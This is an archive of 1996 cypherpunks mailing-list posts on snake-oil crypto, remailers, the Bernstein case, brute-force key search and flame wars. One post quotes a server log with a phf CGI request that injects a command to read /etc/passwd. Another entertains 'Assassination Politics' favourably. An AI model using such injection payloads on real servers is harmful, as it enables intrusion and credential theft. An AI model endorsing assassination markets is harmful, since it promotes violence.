news.texoma.com!news.uoregon.edu!arclight.uoregon.edu!chi-news.cic.net!newsp ump.sol.net!www.nntp.primenet.com!nntp.primenet.com!howland.erols.net!netnew s.com!uhog.mit.edu!grapevine.lcs.mit.edu!ai-lab!ai-lab!not-for-mail >From: The Deviant >Newsgroups: ailab.cypherpunks >Subject: Re: All Bets Off >Date: 19 Sep 1996 20:30:11 -0400 >Organization: MIT Artificial Intelligence Lab >Lines: 26 >Sender: daemon at ai.mit.edu >Message-ID: <51soij$kh2 at life.ai.mit.edu> >NNTP-Posting-Host: life.ai.mit.edu > >On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote: > >> Date: Thu, 19 Sep 1996 11:30:32 -0400 >> From: Daniel Christopher Miskell >> To: Rabid Wombat >> Cc: cypherpunks at toad.com >> Subject: Re: All Bets Off >> >> >On Tue, 17 Sep 1996, Jeff Davis wrote: >> > > >[lots of quoting rm'd] > >> >> Tom Clancy is not a military-hired brain, but to make his novels realistic and >> to do justice to the people he portrays, he does a LOT of research. He is a >> highly respected author, and I have no doubt that his statement is based on >> his personal findings, collected for a previous novel. >> > >I beleive he was also a Capain in the Navy... > > --Deviant >Old MacDonald had an agricultural real estate tax abatement. > > > -------------- 30 -------------- Joel Jacobs jjacobs at koyote.com "Most people yearn for the return to an idealized past, a past, which, in fact, never existed." Frank Herbert, "Dune" From alano at teleport.com Sun Sep 22 14:17:53 1996 From: alano at teleport.com (Alan Olsen) Date: Mon, 23 Sep 1996 05:17:53 +0800 Subject: Snake-Oil FAQ Message-ID: <3.0b16.32.19960922114533.00704c20@mail.teleport.com> At 03:48 AM 9/22/96 -0700, Timothy C. May wrote: >The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons most >in need of it won't read it. > >If those who post descriptions of their "Unbreakable Virtual Whammo-Matic >Really Complicated Transposition Cipher" have not bothered to read Schneier >or other basic texts on ciphers, why would they bother to read a Snake Oil >FAQ? This applies to their customers as well. I agree that it will no change the glorified decoder ring salesmen, but it can have a positive effect on their customers. The FAQ has the ability to reach those who would not nessisarily read Schneier or any other large tome. Most of the people outside of this forum have some understanding of cryptography. Most of that understanding is based on folklore and marketing hype. If we do not take pains to educate them as to what real crypto is, then we might as well just sit here and prattle on about Assassination Politics and ad hominem. You seem to take a pretty negative attitude about what the general public can and cannot learn from. If Cypherpunks do not help educate the masses, who will? The snake oil salesmen? The Government? The masses themselves? They are not going to go out and buy a book intended for programmers. (And especially one that costs about $50.) There are no "cryptography for dummies" books. (At least none worth a damn.) A FAQ has the ability to propigate in channels that books cannot. You cannot forward a book via e-mail. (Some will claim I have tried...) The FAQ has the capability to do alot of good. If not, where do you think the energy would be better spent? "If it saves just one newbie..." --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises." From adam at homeport.org Sun Sep 22 14:59:18 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 23 Sep 1996 05:59:18 +0800 Subject: Macintosh Mixmaster port... Who's doing it? In-Reply-To: <199609221731.TAA18577@basement.replay.com> Message-ID: <199609222016.PAA00572@homeport.org> | "Myers W. Carpenter" wrote: | | > Does anyone have any idea who might be attempting a Macintosh | > Mixmaster port? I and some other people were eyeing the idea. If you | > know who might be doing this port I would appreciate hearing from them. | > Thanks. | > myers | | You can run mixmaster on a mac, see http://mklinux.apple.com/ No, you can run UNIX on Mac hardware, and then run Mixmaster on UNIX. You can also get AUX and MachTen to run Linux on your Mac hardware. Both are production systems, unlike the DR1 release of MkLinux. MachTen (www.tenon.com) has the clear advantage for most people of being able to run Mac & Unix apps at the same time. However, there is a real need for things like Mixmaster/DOS, the WinSock remailer, and other tools that allow the average home user to set up a remailer without taking the several days or more to install a new OS on their system. A real Mac port of Mixmaster, that integrated with Claris EMailer and Eudora would be a huge boon to the millions of Mac users out there. I have no doubt that Vinnie's mac crypto conference talked a lot about this sort of thing. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From johnbr at atl.mindspring.com Sun Sep 22 15:01:00 1996 From: johnbr at atl.mindspring.com (John Brothers) Date: Mon, 23 Sep 1996 06:01:00 +0800 Subject: Internet File System? Message-ID: <1.5.4.32.19960922191022.00736898@pop.mindspring.com> The other day, it occurred to me that Java could really take off if there was some sort of file system. And, since you can't write to local files with Java, the obvious solution is to set up the 'fopen, fclose(), etc) set of functions that are 'rpcs' to some server application on the same computer as the web server the applet comes from. Since I never manage to come up with new concepts, I assume someone is already working on this, or has already created this. In any case, I've been trying to figure out the best balance of security characteristics for this sort of system. I've written something up at a very high level -- Please let me know what is wrong with it. 1) Before any files can be written or read, the applet has to prompt the user for a password. 2) Password is encrypted one-way, and sent to the server. 3) Server establishes a 'session' (TCP) with the client. At the point, the options are: -- use SSL to maintain security (probably the best, if available) -- providing some sort of encryption, similar to SSL 4) Server would handle all the traditional file manipulation routines, possibly with some restrictions (no access to directories, maybe?) 5) If someone wanted to get a local copy, they would have to ftp to the server, and go to the appropriate place to get it. I can tell this has a couple of weaknesses: a) central authority for creating accounts, maintaining users, etc. b) server side can view all the files at will. b) susceptible to trojan servers I don't know how to reliably solve a). If you don't have some sort of central user admin, you can't avoid denial of service/resource wasting attacks. b) Could be solved by having the user type in (or cut and paste, etc) their entire public key. They could ftp the encrypted document back, and decrypt it with the private key. This would detect and prevent a lot of problems, but dealing with the key would be a bit cumbersome. c) If the server has to send out some sort of validation code that the clients have to accept, it will work ok. But if the attacker has access to the server, they may have access to the java code, and may be able to modify it to not perform the validation. Any ideas ? Thanks for your time. --- John Brothers Do you have a right not to be offended? From thecrow at iconn.net Sun Sep 22 15:18:44 1996 From: thecrow at iconn.net (jack) Date: Mon, 23 Sep 1996 06:18:44 +0800 Subject: Evolving algorithm for faster brute force key searches? Message-ID: <31DD74B1.BB3@iconn.net> I got an idea last night, maybe this has already been thought of and tried, but I thought I would give a quick outline of the program I was thinking of: -Specify a maximum key size (assume 1024bits or something) -Start with an arbitrary key "aaaaaaaaaaaaaa" Start a loop -create five mutations of the key -use each key to try and decrypt a few bytes of the message -run a (or some) statistical analysis tests and come up with a value for how 'random' the decrypted bits are -Pick the key that produced the least random ouput Repeat Probably this wouldnt work on any very strong algorithm, but it seems it might be effective against some. I am going to write the code and try it out on RC4 and on a weakling little algorithm I wrote a while back. Let me know what yall think. From tcmay at got.net Sun Sep 22 15:35:16 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 06:35:16 +0800 Subject: Snake-Oil FAQ Message-ID: At 6:53 PM 9/22/96, Alan Olsen wrote: >I agree that it will no change the glorified decoder ring salesmen, but it >can have a positive effect on their customers. > >The FAQ has the ability to reach those who would not nessisarily read >Schneier or any other large tome. Really? You think someone thinking about buying a cryptographic product for his company, for example, will read an obscure Snake Oil FAQ (even the name presumes familiarity with why some products are "snake oil") while not bothering to read the opening chapters of Denning, Schneier, Brassard, or other such texts? I'll address the issue of "the masses" below. >Most of the people outside of this forum have some understanding of >cryptography. Most of that understanding is based on folklore and >marketing hype. If we do not take pains to educate them as to what real >crypto is, then we might as well just sit here and prattle on about >Assassination Politics and ad hominem. My view is that people interested in buying and using crypto are either bright enough to learn, or are not. A "Snake Oil FAQ" is largely unnecessary, for either category. For the first, because they're bright. For the second, because they're not. >You seem to take a pretty negative attitude about what the general public >can and cannot learn from. If Cypherpunks do not help educate the masses, >who will? The snake oil salesmen? The Government? The masses themselves? > They are not going to go out and buy a book intended for programmers. >(And especially one that costs about $50.) There are no "cryptography for >dummies" books. (At least none worth a damn.) And just who are "the masses"? I've never cared for that term, and rarely use it. But, for the sake of this discussion, just who might they be? Our mothers and fathers who don't use computers? Our neighbors who maybe have a Pentium at work but don't much use computers otherwise? The guy buying a game machine for his kids at CompUSA? The average reader of sci.crypt? (:-}) I believe there is no meaningful way to "reach the masses" until they first show some interest in the subject. And once they do, there is a plethora of ways to learn the basics of cryptography. Nearly all libraries have several books, and nearly every bookstore I have seen has copies of Schneier. Further, the various FAQs available already cover enough of the basics for someone to know why, for example, a "virtual one-time pad, with keys issued by our company" is patently bogus. Again, if "Joe Average" hasn't encountered this sort of stuff, no "Snake Oil FAQ" is likely to reach him. I do think there's a potential "market" for such a Snake Oil FAQ: the journalists who are looking for a pithy line to use in a review of "Super Bass-O-Matic Virtual Decoder Ring." But that's about the only market (or reader base) I see. Have fun with it, just don't gull yourself into thinking it's something "the masses" will read. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Sun Sep 22 16:00:39 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 23 Sep 1996 07:00:39 +0800 Subject: Spam from Timmy May (fart) and his merry band of mailbombers Message-ID: <5saouD5w165w@bwalk.dm.com> Is this another one of Tim May's accounts? ]From varange at crl.com Sun Sep 22 15:39:37 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 22 Sep 96 15:59:10 EDT ] for dlv ]Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA01600 for dlv at bwalk.dm.com; Sun, 22 Sep 96 15:39:37 -0400 ]Received: from crl13.crl.com by mail.crl.com with SMTP id AA02700 ] (5.65c/IDA-1.5 for ); Sun, 22 Sep 1996 12:40:01 -0700 ]Received: by crl13.crl.com id AA05247 ] (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Sun, 22 Sep 1996 12:33:43 -0700 ]From: Troy Varange ]Message-Id: <199609221933.AA05247 at crl13.crl.com> ]Subject: Re: [NEWS] ]To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) ]Date: Sun, 22 Sep 1996 12:33:43 -0700 (PDT) ]In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 18, 96 08:07:56 pm ]X-Mailer: ELM [version 2.4 PL23] ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7bit ]Content-Length: 1605 ] ]> ]> American Banker, 9/17/96 ]> ]> CHASE TO OFFER DEALERSHIPS AUTO LOAN DECISIONS OVER INTERNET ]> ]> Chase Manhattan Corp.'s auto financing division has begun using the ]> Internet to provide dealerships with loan-approval decisions. The bank ]> is the first of eight financial institutions that have committed to ]> using the system, developed by IBM Corp. By computerizing loan ]> applications and sending data electronically, Chase officials said the ]> bank can grant approvals in as few as two minutes. Up to 50% of the ]> division's auto loans will be running through the system within the ]> next 18 months. Chase, the largest car lender not affiliated with a car ]> company, is connected to six dealerships currently using the system and ]> will establish connections to 100 dealers with the official introduction ]> in October. Other financial institutions planning to use the on-line ]> system include NationsBank Corp., G.E. Capital Auto Financial Services ]> Inc., Regions Financial Corp., and Citibank Puerto Rico. The dealer's ]> computer is connected to the Internet through the IBM Globa l Network, ]> which is also used to retrieve an encrypted report from a credit bureau. ]> The dealer's pre-established "key" decodes the report and causes the ]> screen to display one, two, or three stars -- representing poor, fair, ]> or good credit. This gives the dealer an idea of which financial ]> institutions are most likely to approve the loan. ]> ]> --- ]> ]> Dr.Dimitri Vulis KOTM ]> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps ]> ]F^Ackhead. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Sun Sep 22 16:48:07 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 07:48:07 +0800 Subject: Evolving algorithm for faster brute force key searches? Message-ID: At 8:01 PM 7/5/96, jack wrote: >I got an idea last night, maybe this has already been thought of and >tried, but I thought I would give a quick outline of the program I was >thinking of: > >-Specify a maximum key size (assume 1024bits or something) >-Start with an arbitrary key "aaaaaaaaaaaaaa" > >Start a loop > >-create five mutations of the key >-use each key to try and decrypt a few bytes of the message >-run a (or some) statistical analysis tests and come up with a value >for how 'random' the decrypted bits are >-Pick the key that produced the least random ouput Schneier actually used my explanation of why this won't work in the Second Edition of his book. Basically, with any strong. modern cipher, there is no concept of "getting closer" to a solution. Thus, the "fitness landscape" for a brute-force-needed cipher looks like a flat plain (if portrayed in two dimensions), with the solution/key being a single-point spike rising from the plain. No hill-climber can find this spike except by landing right on it, which means evolutionary programming, genetic algorithms, simulated annealing, and neural net sorts of approaches are worthless. With some weak ciphers, this might work. I think Schneier makes some comments about who's looked at this. But weak ciphers are not too interesting. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jf_avon at citenet.net Sun Sep 22 16:54:51 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Mon, 23 Sep 1996 07:54:51 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: <9609222138.AB13535@cti02.citenet.net> On 22 Sep 96 at 9:36, jim bell wrote: > >Where is Jimmy Hoffa? > > And it worked! Hey Jim, makes me a bit nervous when you talk that tripe. Unions were using guns and they still do, although the hand holding it now is the govt. But I suppose that you were answering only on a strictly factual basis. Ciao jf P.S. send any comments to me directly, as I am not on CPunks anymore. So many things to do, so little time... ...sigh... Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Finest Limoges porcelain and crystal JFA Technologies, R&D consultant physicists and engineers, LabView programming PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From azur at netcom.com Sun Sep 22 17:04:32 1996 From: azur at netcom.com (Steve Schear) Date: Mon, 23 Sep 1996 08:04:32 +0800 Subject: Internet File System? Message-ID: >The other day, it occurred to me that Java could really take off if there >was some sort of file system. And, since you can't write to local files >with Java, the obvious solution is to set up the 'fopen, fclose(), etc) >set of functions that are 'rpcs' to some server application on the same >computer as the web server the applet comes from. > >Since I never manage to come up with new concepts, I assume someone is already >working on this, or has already created this. > Eric Hughes, well known cypherpunk, presented a two-part paper at DEFCON IV. The first part of the paper, entitled the "Universal Piracy System" or UPS, addresses an Internet/Web file system which offers universal access and privacy. The second part addresses how the UPS can be the enabler for the demise of copyright while offering a market driven replacement of an entirely different character. I hear Eric is refining these ideas and we hope to see something published soon. Perhaps he's lurking and will respond. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to prescription DRUGS. From aba at dcs.ex.ac.uk Sun Sep 22 17:15:19 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Mon, 23 Sep 1996 08:15:19 +0800 Subject: crypto anarchy vs AP Message-ID: <199609221810.TAA00172@server.test.net> Been reading the AP thread, and thought I'd donate some of my views. To me, crypto anarchy is a means to achieve a more libertarian government, it is a pivotal tool to reduce government power, and enable freedom and privacy. A libertarian government means a less powerful government, less taxes, less onerous laws, more freedoms. I don't think AP as stated by Jim could escalate quickly enough as a mechanism to introduce a libertarian government, because if it got to the state that too many politicians were openly threatened, and killed, the government would declare a state of war, and switch off the Internet. You'd just cause the government to panic, and this would have negative effects, it would take ages for them to calm down, and the laws they'd pass in the mean time would mean a near certainty of mandatory GAK as a condition to switching the Internet back on. (Before someone takes me to task for the impossibility of switching the Internet off, it all depends on the level of government panic. More specifically perhaps they would disconnect key backbones, and ISPs briefly while they rushed into effect a few presidential decrees outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets, etc.) I think I understand what Jim is saying with AP, that it might be a way to accelerate the arrival of libertarian government. I'm not saying I have any moral problems with a suitably restrained version of AP, if it saved lives and resulted in a better life for many people. (Some people might even view it as having a certain element of poetic justice:-) However I don't think it would survive the above hurdle. (Also I have some thoughts on why AP might not achieve the desired effects even if it could survive the hurdle which I will save for now, in the interests of keeping this to a digestible length.) Libertarian governments, if they come, I think will be more easily, and more likely achieved via non-violent means. I think it will be a much more gradual process, and that government power will just be gradually eroded as international businesses gain power, and borders become more open, trade more free, as travel becomes cheaper, and moving to another country becomes less of a hassle. Telecommuting, and remote education should help reduce the problems of moving country. If you telecommute, and your kids (if you have any) are taught via the Net, and you can talk to your friends in photo realistic real time VR chat rooms, it becomes much less important where on the planet you live. As information based work becomes more important, significant proportions of government tax revenues may be siphoned off to tele-workers from tax havens, and to those who just ignore local tax laws in favor of anonymous ecash. The ability to jurisdiction shop for laws, and taxes in itself will reduce governments options. It will induce governments to try to provide incentives for international businesses to use their jurisdictions, and to create the appearance of as free a life style as they can for individuals. The jurisdiction shopping will start amongst the disenfranchised, and the adventurous, but will spread as the advantages become clearer, and the hurdles are reduced. Tax collection will be restructured to tax tangibles, and reduced to encourage customers (citizens). Governments are currently flailing around trying to prolong the inevitable. The fall out from this is beginning to annoy some people. If it annoys enough people soon enough that they vote in a Libertarian candidate for president in the next 20 years, crypto anarchy, and libertarian governments could be reached more quickly. I'm not sure it will ever get that far though, because the more votes the libertarians get over the following years, the closer we get to libertarian anyway, because the government has to start adopting their policies to get the votes back. (Much like the green movement, which once it started getting significant votes, and media attention, was pandered to by politicians of all parties. They're all green now:-) And so libertarian thinking starts to affect government thinking. Crypto anarchy privacy preserving goodies such as anonymous ecash, anonymous email, strongly free speech, right to encryption start to fair better, and so start to undermine whats left of government. Politicians, now posturing to try and look more libertarian might even start to take on board the idea that there are simply too many government employees, that may be the war on drugs causes more problems than it solves, that sounding pro free speech is something that might carry some votes, etc. By the time governments get weak enough for AP to be feasible, they will be so weak, and eager to entice you into their jurisdiction with promised single digit tax rates, private dietary recommendation services, friendly police forces, advertised local highlights: local casinos, brothels, cuisine, favorable climate, reasonably priced housing, etc, etc. that no one will care much about offing the fawning officials (head salesmen, and brochure designer) anyway. Well thats my theory :-) It could all suffer a huge set-back if the government panics too soon, and passes mandatory GAK by presidential decree or something. One hopes that whats left of the US first ammendment, and judicial system would be enough to repeal such a move, but you never know. Adam -- #!/bin/perl -sp0777i Unfortunately, you've probably all received something that started out like this: >> You are being gently flamed because. Sorry about that. I've been gone for the last few days and found out that one of my incoming mail filters was somewhat flawed. Instead of sending that generic response only to the esteemed Dr. Vulis it was sending it to any message with his address *in the header*. It also replied to any cc:ed addresses. Ooops... Also, there is no need to speculate about any ulterior motives. It was entirely a setup glitch. There's an important reminder here: don't make setup changes at 2 am and then disappear for 4 days! Again, sorry to the list about this. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From perry at piermont.com Sun Sep 22 18:47:04 1996 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 23 Sep 1996 09:47:04 +0800 Subject: Evolving algorithm for faster brute force key searches? In-Reply-To: <31DD74B1.BB3@iconn.net> Message-ID: <199609222305.TAA08525@jekyll.piermont.com> The problem with your idea, Jack, is that any decent crypto algorithm will change on average half the output bits when one bit of the key is changed. In other words, by definition, if you can do this, the algorithm isn't as strong as it should be. However, you are correct that failures to meet this standard properly can be found in some popular algorithms. You might want to read Biham and Shamir's book on differential cryptanalysis for details. jack writes: > I got an idea last night, maybe this has already been thought of and > tried, but I thought I would give a quick outline of the program I was > thinking of: > > -Specify a maximum key size (assume 1024bits or something) > -Start with an arbitrary key "aaaaaaaaaaaaaa" > > Start a loop > > -create five mutations of the key > -use each key to try and decrypt a few bytes of the message > -run a (or some) statistical analysis tests and come up with a value > for how 'random' the decrypted bits are > -Pick the key that produced the least random ouput > > Repeat > > > Probably this wouldnt work on any very strong algorithm, but it seems it > might be effective against some. I am going to write the code and try > it out on RC4 and on a weakling little algorithm I wrote a while back. > Let me know what yall think. From richieb at teleport.com Sun Sep 22 19:51:34 1996 From: richieb at teleport.com (Rich Burroughs) Date: Mon, 23 Sep 1996 10:51:34 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <3.0b24.32.19960922171430.00685008@mail.teleport.com> At 04:39 PM 9/21/96 -0800, Jim Bell wrote: >At 02:03 PM 9/18/96 -0700, John Gilmore wrote: [snip] >>* Any legal framework that allows a government bureaucrat to >>censor speech before it happens is an unconstitutional prior restraint. >>The government is not allowed to set up such a drastic scheme >>unless they can prove that publication of such information will >>"surely result in direct, immediate, and irreparable damage to our >>Nation or its people" and that the regulation at issue is necessary >>to prevent this damage. > >At the risk of being a devil's advocate, let me suggest that you are >conceding too much even with the preceding paragraph. The 1st amendment >says nothing about preventing speech which (even admittedly) would result >in "direct, immediate, and irreparable damage to our nation or its people." [snip] Jim, that's a quote of Potter Stewart from the Pentagon Papers case, if I'm not mistaken. It's not written in the Constitution, but Supreme Court precedent is the next best thing as far as con law goes. >The way you've written the paragraph I've quoted above, it appears that you >are somehow acknowleding that there are certain circumstances where certain >types of speech are controllable because they are "harmful," but you fail to >explain how even this constitutional restiction is tolerable. Frankly, I >don't see it! What you need to do is to be far more specific about such >speech and exactly where it can be controlled. What you need to do is look at the case law :) The government can restrict speech in time, place or manner, according to the courts. Restricting content is more difficult, and places a much heavier burden on the gov. To expect people writing about and arguing the case to completely ignore the existing case law is foolish, IMHO. >I should point out, also, that this is the second time I've mentioned this. >You're doing us a disservice if you concede too much in this area. I think that John and EFF are doing us a huge service by their involvement in the case. I am very optimistic about the outcome of the Bernstein case. Judge Patel's ruling that source code = speech really puts the debate in the plaintiff's court, and we saw some of that in the hearing on Friday, IMHO. Much of the argument was about prior restraint, with the government trying to claim that they are only trying to restrict a specific functionality of crypto code and not the ideas behind it. This seemed to be a fairly weak argument to me, and the plaintiff's attorney pointed out that the ideas embodied in the source code are what dictate the functionality. The plaintiff's attorney (Cindy Cohn) also argued 3 lines of cases that bear on the issue: 1) Compelled speech. 2) Anonymity. 3) Freedom of association. Cohn also argued that the statute is vague (terms like "general principle" and "fundamental research") and overbroad; also that the current version of ITAR does not even meet the scrutiny of the DOJ's own OLC review of the statute. When the attorney for the gov tried to drift back to the issue of whether source code is speech, Judge Patel said, "You'll get that chance again in another court with more judges." Near the end of the hearing, the government attorney stated that the statute describes "what is not controlled," which elicited a pretty hearty laugh from the spectators. Not a real strategic admission. The plaintiff's brief is at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/Legal/960726_filin g/motion_partsj.html There's quite a bit of info in that same directory. Rich ______________________________________________________________________ Rich Burroughs richieb at teleport.com http://www.teleport.com/~richieb See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon U.S. State Censorship Page at - http://www.teleport.com/~richieb/state New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause From adam at homeport.org Sun Sep 22 20:00:23 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 23 Sep 1996 11:00:23 +0800 Subject: Macintosh Mixmaster port... Who's doing it? In-Reply-To: <3.0b19.32.19960922162606.006c1644@ricochet.net> Message-ID: <199609230120.UAA01100@homeport.org> Greg Broiles wrote: | At 03:16 PM 9/22/96 -0500, Adam Shostack wrote: | | > A real Mac port of Mixmaster, that integrated with Claris | >EMailer and Eudora would be a huge boon to the millions of Mac users | >out there. I have no doubt that Vinnie's mac crypto conference talked | >a lot about this sort of thing. | | Actually, the Mac crypto conference didn't spend any time at all on | Mixmaster - which is not intended as a criticism of either the conference | or of Mixmaster, but it just didn't happen. (By this sort of thing, I was refering more to the privacy apps 'integrated with Claris EMailer and Eudora,' which you go on to discuss. I think that a remailer client needs to be integrated with the usual mail tools, not seperate.) | I gave a very short talk and said that I thought the Mac needed three apps, | for people who wanted to jump in a write something useful to the cause of | privacy on the net and didn't want to reinvent any wheels: a remailer | client with a good user interface, a Mac-native remailer, and an | implementation of DC-nets. Mixmaster would, of course, address two of those | three. Lucky tells me that there is already a Mac implementation of | DC-nets, but it doesn't seem to be very well known. I don't know of any DC net implementation, and would be really eager to hear Lucky expound on this. | For what it's worth, I think future remailer/Mixmaster development might do | well in Java. I'm not especially sold on or trusting of the alleged | security or trustability features of Java (sorry, no offense) but I *do* | think it's a neat tool for building non-machine specific network aware | applications. Ignore the fact that people use it to build silly animations | or that downloadaded applets may or may not be secure - it's still useful | as a development tool. I agree, especially if we write a protocol that allows a user to connect to a mixmaster, get a pool of messages, and remail them on to their destanation, along with a message of his own. (This is a half baked idea; there are obvious denial of service issues, as well as reliability issues in the well intentioned cases.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From shamrock at netcom.com Sun Sep 22 20:13:53 1996 From: shamrock at netcom.com (Lucky Green) Date: Mon, 23 Sep 1996 11:13:53 +0800 Subject: Macintosh Mixmaster port... Who's doing it? In-Reply-To: <3.0b19.32.19960922162606.006c1644@ricochet.net> Message-ID: On Sun, 22 Sep 1996, Greg Broiles wrote: > Lucky tells me that there is already a Mac implementation of > DC-nets, but it doesn't seem to be very well known. There is an Apple(Local?)Talk implementation of DC nets. Somebody please check the Eurocrypt proceedings of the late 80's. --Lucky From sbrath at froglit.scitele.com Sun Sep 22 20:18:17 1996 From: sbrath at froglit.scitele.com (Shane Brath) Date: Mon, 23 Sep 1996 11:18:17 +0800 Subject: Go away CIA In-Reply-To: Message-ID: On Sat, 21 Sep 1996, Wearen Life wrote: > I wont be suprised if they where ALSO watching who was visting your page. > I think now is the time to start looking in your hard drive or floppy > disk for anything that my incrimanate you. (did i spell that right)? My 2 cents. But how would they go about globaly watching who goes to your URL, unless they hack into your server and look at the log, or have a network sniffer at a access point feeding you? > > Well well... > > > > After putting up the CIA hack mirror page on http://www.skeeve.net/cia/ > > I learnt a few things. > > > > o it got 50,000 hits in 1 day > > o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov > > department looked at it masses of times. The CIA looked at it every 10-15 > > minutes. > > zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l > > 281 > > > > o Even the CIA tries to hack you. > > > > relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180 > > > > o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and > > ncsc.mil sites. [ rest of text snipped ] From Kevin.L.Prigge-2 at tc.umn.edu Sun Sep 22 20:27:36 1996 From: Kevin.L.Prigge-2 at tc.umn.edu (Kevin L Prigge) Date: Mon, 23 Sep 1996 11:27:36 +0800 Subject: Spam from Timmy May (fart) and his merry band of mailbombers In-Reply-To: <5saouD5w165w@bwalk.dm.com> Message-ID: <3245dfcc3e29002@noc.tc.umn.edu> Dr.Dimitri Vulis KOTM said: > Is this another one of Tim May's accounts? > > ]From varange at crl.com Sun Sep 22 15:39:37 1996 Gee, Larry^H^H^H^H^HDimitri, the proper word is tentacle. As you might recall, we're all just tentacles of TC May. -- Kevin L. Prigge | "I rarely saw people sitting at Systems Software Programmer | computers producing real code Internet Enterprise - OIT | wearing ties." - Philippe Kahn University of Minnesota | (speech at Software Development '90) From bdavis at thepoint.net Sun Sep 22 20:34:56 1996 From: bdavis at thepoint.net (Brian Davis) Date: Mon, 23 Sep 1996 11:34:56 +0800 Subject: Death Threats In-Reply-To: Message-ID: ... On Sat, 21 Sep 1996, Timothy C. May wrote: > > Hey, I'm a candidate for President, too (at least I know of someone who > plans to vote for me). Does this mean I am protected against various > threats, and veiled threats? Let me know, as I seem to be under attack by > certain Russian-developed spambots. > > More seriously, the whole set of protections the President has is > inconsistent with our nominally anti-royalist approach. Of course, America > long ago created its own royalty. Even dynasties (how else do you explain > Teddy Kennedy getting away with the Mary Jo Kopechne thing?). > > Actively (and plausibly) threatening _anyone_ is a kind of crime (*), but > there is no reason to make special laws covering certain persons. The law specifically criminalizing threats against the President (and other specified persons) gives federal authorities jurisdiction to investigate the cases, which frequently have interstate connections. It is relatively difficult for a state to investigate and prosecute an interstate case. That's not the only reason for the law, though. EBD > (* Why do I say "actively (and plausibly) threatening _anyone_ is a kind of > crime"? Don't I believe in free speech? Well, if I hear that Vladimir G. > Nulis says I should be killed, and that he is coming to California to take > care of this, I have no compunctions, liberrarian or otherwise, about > shooting first at the first sign of his appearance on my property. > Understandably, the government does not wish this to happen. Thus, I have > no problem with illegalizing direct and concrete threats. General threats, > such as "all lawyers should be taken out into the parking lot and garotted" > are not specific, direct, and concrete, and hence fall under the free > speech provisions.) > > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > From dthorn at gte.net Sun Sep 22 20:48:47 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 23 Sep 1996 11:48:47 +0800 Subject: Timmy May's spam (Was: Re: CIA hacked) In-Reply-To: Message-ID: <3245DFCA.6EAB@gte.net> 